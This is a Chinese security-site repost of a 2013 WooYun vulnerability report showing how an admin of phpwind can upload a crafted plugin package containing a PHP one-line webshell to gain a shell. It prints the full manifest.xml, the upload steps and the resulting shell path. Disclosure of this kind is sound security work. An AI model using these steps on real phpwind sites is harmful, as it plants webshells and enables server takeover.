热门关键字:   网站安全  黑客攻防  安全漏洞  系统安全  网络安全
站外
广告
域名申请虚拟主机 信息安全 域名注册 云主机 网络安全技术 企业网络安全 站外
广告
文字广告位招租 文字广告位招租 文字广告位招租 文字广告位招租 云安全

phpwind后台getshell

发布时间:2013-09-08 22:35文章来源:wooyun文章作者:黑白前线 点击次数:
摘要:漏洞作者: VIP 提交时间: 2013-06-11 14:14 公开时间: 2013-09-06 14:15 漏洞类型: 文件上传导致任意代码执行 详细说明: 后台上传插件处,可以上传一个包含php木马的phpwind标准格式插件安装包,并可getshell. 1.先制作一个安装包,需要包含一个manifes...

漏洞作者: VIP

提交时间: 2013-06-11 14:14
公开时间: 2013-09-06 14:15

漏洞类型: 文件上传导致任意代码执行
详细说明:

后台上传插件处,可以上传一个包含php木马的phpwind标准格式插件安装包,并可getshell.

1.先制作一个安装包,需要包含一个manifest.xml文件和一个php一句话(此处文件名为php.php)。

manifest.xml如下:

<?xml version="1.0" encoding="gbk"?>

<manifest>

<application>

<name>getshell</name>

<alias>getshell</alias>

<version>1.0</version>

<pw-version>1.0</pw-version>

<type>app</type>

<description>getshell

</description>

<charset>gbk</charset>

<website>http://wooyun.org</website>

<author-name>VIP@wooyun</author-name>

<author-email>root@wooyun.org</author-email>

<author-icon>http://wooyun.org</author-icon>

</application>

<res>res</res>

</manifest>

 

将以上文件打包成zip格式。

2.在后台 云平台-》应用管理-》本地安装处上传制作好的安装包,并点击安装。

 

phpwind后台getshell

 

3.shell为http://127.0.0.1/phpwind/src/extensions/getshell/php.php

 

phpwind后台getshell

 

标签分类:

上一篇:SKCMS上传漏洞
下一篇:espcms后台getshell-3 利用csrf交互强制管理员getshell